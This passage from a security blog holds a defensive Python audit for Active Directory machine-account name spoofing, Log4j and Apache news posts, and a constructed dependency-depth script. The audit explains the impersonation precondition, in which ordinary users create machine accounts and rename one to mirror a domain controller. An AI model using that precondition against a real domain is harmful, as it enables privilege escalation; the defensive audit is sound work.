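The two facts in the paragraph above, that computer sAMAccountNames normally end with `$` and that any user may create up to 10 machine accounts and edit their names, give a defender a direct audit: list computer objects and flag any whose name has lost its `$`, whose name (ignoring `$`) matches a domain controller, or which was created by an ordinary user. The script below, added here as an example and not Microsoft's detection guidance, does that over directory records. The records, domain controller names and creator principals are constructed in the shape a collection script might return.

```python
"""Audit computer accounts for the spoofing precondition described above:
a computer object whose sAMAccountName lacks its trailing '$' or mirrors a
domain controller's name, and machine accounts created by ordinary users
under the default ms-DS-MachineAccountQuota of 10. Added example, not
Microsoft's guidance; the records below are constructed."""

DOMAIN_CONTROLLERS = {"DC01", "DC02"}                              # constructed
PRIVILEGED_CREATORS = {"CORP\\Domain Admins", "CORP\\Administrator"}  # constructed

SAMPLE_COMPUTERS = [  # constructed directory records (sAMAccountName, creator)
    {"sAMAccountName": "WS01$",  "creator": "CORP\\Domain Admins"},
    {"sAMAccountName": "DC01",   "creator": "CORP\\alice"},
    {"sAMAccountName": "LAB07$", "creator": "CORP\\bob"},
    {"sAMAccountName": "DC02$",  "creator": "CORP\\Domain Admins"},
]


def audit_computer_accounts(computers, dcs=DOMAIN_CONTROLLERS,
                            privileged=PRIVILEGED_CREATORS) -> dict:
    """Map each flagged sAMAccountName to the list of reasons it was flagged."""
    dc_names = {d.upper().rstrip("$") for d in dcs}
    findings = {}
    for rec in computers:
        sam = rec["sAMAccountName"]
        reasons = []
        if not sam.endswith("$"):
            reasons.append("computer account without trailing '$'")
        # A DC's own account is "DC01$"; a second object named "DC01" is the
        # name collision the impersonation chain depends on.
        if not sam.endswith("$") and sam.upper() in dc_names:
            reasons.append("name collides with a domain controller")
        if rec.get("creator") not in privileged:
            reasons.append("created by an unprivileged principal (machine account quota)")
        if reasons:
            findings[sam] = reasons
    return findings


if __name__ == "__main__":
    for sam, reasons in audit_computer_accounts(SAMPLE_COMPUTERS).items():
        print(sam)
        for reason in reasons:
            print("   -", reason)
```

The creator check is informational on its own: a machine joined by a help-desk user is normal in many environments. It becomes decisive when it co-occurs with the other two reasons, as it does for the constructed `DC01` record. The quota of 10 that the paragraph mentions is the default value of the domain's ms-DS-MachineAccountQuota attribute, and lowering it to 0 removes the ability of ordinary users to create machine accounts at all.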

Tags: Active Directory flaws


Dec 21 2021

Apache’s other product: Critical bugs in ‘httpd’ web server, patch now!

Category: Web Security | DISC @ 11:37 am

Pick a random person, and ask them these two questions:

Q1. Have you heard of Apache?
Q2. If so, can you name an Apache product?

We’re willing to wager that you will get one of two replies:

A1. No. A2. (Not applicable.)
A1. Yes. A2. Log4j.

Two weeks ago, however, we’d suggest that very few people had heard of Log4j, and even amongst those cognoscenti, few would have been particularly interested in it.

Until a cluster of potentially catastrophic bugs – originally implemented as features, on the grounds that less is never more – were revealed under the bug-brand Log4Shell, the Log4j programming library was merely one of those many components that got sucked into and used by thousands, perhaps even hundreds of thousands, of Java applications and utilities.

Log4j was just “part of the supply chain” that came bundled into more back-end servers and cloud-based services than anyone actually realised until now.

Many sysadmins, IT staff and cybersecurity teams have spent the past two weeks eradicating this programmatic plague from their demesnes. (Yes, that’s a real word. It’s pronounced domains, but the archaic spelling avoids implying a Windows network.)

Don’t forget “the other Apache”

Tags: Apache HTTP Server, Apache patch, critical bug


Dec 21 2021

More than 35,000 Java packages impacted by Log4j flaw, Google warns

Category: Log4j, Security logs, Security vulnerabilities | DISC @ 11:12 am

The Google Open Source Team scanned the Maven Central Java package repository and found that 35,863 packages (8% of the total) were using versions of the Apache Log4j library vulnerable to the Log4Shell exploit and to the CVE-2021-45046 RCE.

“More than 35,000 Java packages, amounting to over 8% of the Maven Central repository (the most significant Java package repository), have been impacted by the recently disclosed log4j vulnerabilities (12), with widespread fallout across the software industry.” reads the report published by Google. “As far as ecosystem impact goes, 8% is enormous.”

The Google experts used Open Source Insights, a project that maps open source dependencies, to assess all versions of all artifacts in the Maven Central Repository.

The experts pointed out that the direct dependencies account for around 7,000 of the affected packages. Most of the affected artifacts are related to indirect dependencies.


“The deeper the vulnerability is in a dependency chain, the more steps are required for it to be fixed. The following diagram shows a histogram of how deeply an affected log4j package (core or api) first appears in consumers dependency graphs.” reads the post published by the researchers. “For greater than 80% of the packages, the vulnerability is more than one level deep, with a majority affected five levels down (and some as many as nine levels down). These packages will require fixes throughout all parts of the tree, starting from the deepest dependencies first.”

But since the vulnerability was disclosed, 13% of all vulnerable packages have been fixed (4,620).
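The histogram Google describes, how many hops down a consumer's dependency graph the first affected log4j artifact sits, and the "fix the deepest dependencies first" ordering both fall out of a breadth-first walk over the graph. The script below, added here as an example and not Open Source Insights code, computes the depth at which `log4j-core` or `log4j-api` first appears for each artifact, builds the histogram, and lists the artifacts that need a release for one consumer, deepest first. The dependency graph and artifact coordinates are constructed.

```python
"""Depth at which an affected log4j artifact first appears in a consumer's
dependency graph, the histogram over all consumers, and the deepest-first
fix order for one consumer. Added example, not Google's Open Source
Insights code; the graph below is constructed."""
from collections import Counter, deque

AFFECTED = {"org.apache.logging.log4j:log4j-core",
            "org.apache.logging.log4j:log4j-api"}

# Constructed graph: artifact -> direct dependencies.
GRAPH = {
    "com.example:web-app":        ["com.example:web-framework", "com.example:json-utils"],
    "com.example:web-framework":  ["com.example:logging-facade"],
    "com.example:logging-facade": ["org.apache.logging.log4j:log4j-core"],
    "org.apache.logging.log4j:log4j-core": ["org.apache.logging.log4j:log4j-api"],
    "org.apache.logging.log4j:log4j-api":  [],
    "com.example:json-utils":     [],
    "com.example:cli-tool":       ["org.apache.logging.log4j:log4j-api"],
    "com.example:clean-lib":      ["com.example:json-utils"],
}


def first_affected_depth(graph, root, affected=AFFECTED):
    """Hops from root to the nearest affected artifact, or None if unaffected.
    Breadth-first, so the first affected node reached is the shallowest."""
    seen = {root}
    queue = deque([(root, 0)])
    while queue:
        node, depth = queue.popleft()
        if node in affected:
            return depth
        for dep in graph.get(node, ()):
            if dep not in seen:
                seen.add(dep)
                queue.append((dep, depth + 1))
    return None


def depth_histogram(graph, affected=AFFECTED) -> Counter:
    """Count consumers by the depth of their first affected dependency."""
    hist = Counter()
    for artifact in graph:
        if artifact in affected:
            continue
        depth = first_affected_depth(graph, artifact, affected)
        if depth is not None:
            hist[depth] += 1
    return hist


def fix_order(graph, root, affected=AFFECTED) -> list:
    """Artifacts on any path from root to an affected one, deepest first:
    each must publish a fixed release before the one above it can consume it."""
    dist = {root: 0}
    queue = deque([root])
    while queue:                                   # BFS distances from root
        node = queue.popleft()
        for dep in graph.get(node, ()):
            if dep not in dist:
                dist[dep] = dist[node] + 1
                queue.append(dep)
    memo = {}

    def reaches_affected(node):
        if node in affected:
            return True
        if node in memo:
            return memo[node]
        memo[node] = False                         # cycle guard
        memo[node] = any(reaches_affected(d) for d in graph.get(node, ()))
        return memo[node]

    chain = [n for n in dist if n not in affected and reaches_affected(n)]
    return sorted(chain, key=lambda n: (-dist[n], n))


if __name__ == "__main__":
    for depth, count in sorted(depth_histogram(GRAPH).items()):
        print(f"{count} package(s) first affected {depth} level(s) down")
    print("fix order for web-app:", fix_order(GRAPH, "com.example:web-app"))
```

On the constructed graph `web-app` is affected three levels down, and nothing it publishes is clean until `logging-facade` and then `web-framework` have each shipped a release, which is the ordering constraint the post is describing.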

How long will it take for this vulnerability to be fixed across the entire ecosystem?

Log4j Java Programmer Programming Coding Funny Tote Bag

Tags: Java packages, Log4j, Log4shell


Dec 20 2021

Insider Threat Mitigation for U.S. Critical Infrastructure

Category: Insider Threat | DISC @ 12:27 pm

Inside Jobs: Why Insider Risk Is the Biggest Cyber Threat You Can’t Ignore

Tags: Critical infrastructure, Inside Jobs, Insider Risk, Insider Threat Report

